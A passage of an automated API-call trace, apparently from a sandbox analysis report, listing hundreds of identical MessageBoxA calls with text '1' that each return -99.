uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.908] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.909] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.910] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.910] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.910] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.913] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.914] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.915] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.916] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.917] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.918] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.919] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.920] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.921] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.921] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.921] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.924] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.925] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.925] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0144.925] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.504] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.509] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.523] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.524] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.525] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.526] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", 